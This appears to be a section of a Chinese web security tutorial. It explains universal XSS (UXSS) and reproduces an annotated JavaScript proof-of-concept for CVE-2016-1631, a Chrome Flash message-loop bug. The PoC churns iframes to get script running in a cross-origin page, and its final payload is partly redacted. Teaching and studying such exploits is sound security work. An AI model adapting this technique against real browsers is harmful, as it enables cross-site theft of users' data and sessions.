1.3.11 Uxss

UXSS全称Universal Cross-Site Scripting,翻译过来就是通用型XSS,也叫Universal XSS。与普通XSS利用的是某个网站自身的缺陷不同,UXSS利用的是浏览器或其插件、扩展本身的漏洞,因此脚本可以在任意站点的源(origin)上下文中执行。

以Chrome浏览器Flash message loop 使用不当导致UXSS漏洞(CVE-2016-1631)为例

POC如下

// Shared state for the PoC below (all of these are page-level globals).
// c0: how many times cp() has been called; c() waits for it to reach 10 (one per p.swf frame).
// c1: how many times f() has been called; the second call is the one that does the work.
// fs: the ten <iframe> elements that load p.swf; ml() pops them one at a time.
var c0 = 0;
var c1 = 0;
var fs = [];
// Counter callback: bumps c0. Nothing on this page calls cp() by name, so it is
// presumably invoked from inside p.swf (ExternalInterface) once a frame has
// finished loading — confirm against p.swf, which is not shown here.
function cp() {
++c0;
}
// Stage 1: append ten <iframe>s to the document, each loading the Flash movie
// p.swf, and keep the elements in fs so ml() can consume them in reverse order.
for (var a = 0; a < 10; a++) {
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.src = 'p.swf';
fs.push(i);
}
// One round of the frame churn that the PoC relies on:
//  1. take the most recently created p.swf frame off fs and give its window a
//     unique name ('p' + remaining count);
//  2. call the Flash-side f() exported by the <embed> inside that frame (this is
//     the plugin's method, not the page-level f() defined below);
//  3. navigate that same named window to about:blank via a synthetic <a target=...> click;
//  4. for the last six rounds, busy-wait ~1 s on the main thread before returning.
// The busy-wait is presumably there so the page is still blocked while the
// plugin is running its own (nested) message loop — this is the "message loop
// misuse" the page describes, and the ordering/timing here is what the PoC
// depends on, so it should not be reordered casually.
function ml() {
var pw = fs.pop().contentWindow;
pw.name = 'p' + fs.length;
pw.document.querySelector('embed').f();
var a = document.createElement('a');
a.href = 'about:blank';
a.target = 'p' + fs.length;
a.click();
if (fs.length < 6) {
var then = Date.now();
while (Date.now() - then < 1000) {}
}
}
// Page-level callback counted by c1. Nothing on this page calls it by name; it
// is presumably invoked from the SWF via ExternalInterface — confirm against p.swf.
// On the second call it reaches into the f.html iframe (x, assigned in c();
// f.html itself is not on this page), takes the sibling of its first child
// frame, points it at a cross-origin URL, and keeps calling ml() for as long as
// contentDocument is still readable (i.e. the frame is still same-origin).
// Once the cross-origin load makes that access throw, the catch navigates the
// frame again; the source has redacted the scheme and part of the payload as
// "[removed]", but the remaining text (a location check followed by alert) shows
// the intent: script that should end up running in the cross-origin document —
// which is the UXSS outcome. Depends on x being an implicit global (see c()).
function f() {
if (++c1 == 2) {
var x1 = x.contentWindow[0].frameElement.nextSibling;
x1.src = 'https://abc.xyz';
try {
while (x1.contentDocument) { ml(); }
} catch(e) {
x1.src = '[removed]if(location!="about:blank")alert([removed])';
}
}
}
// Polled every 100 ms by the interval t. Once all ten p.swf frames have
// reported in (c0 == 10) it stops polling and starts stage 2 by loading
// f.html in a fresh iframe.
// Note: x is assigned without var/let, so it becomes an implicit global
// (this would throw under 'use strict'); f() reads it later.
function c() {
if (c0 == 10) {
clearInterval(t);
x = document.documentElement.appendChild(document.createElement('iframe'));
x.src = 'f.html';
}
}
// Start polling for the ten p.swf frames; c() clears this interval itself.
var t = setInterval(c, 100);

一个致力于收集UXSS漏洞的数据库

https://github.com/Metnew/uxss-db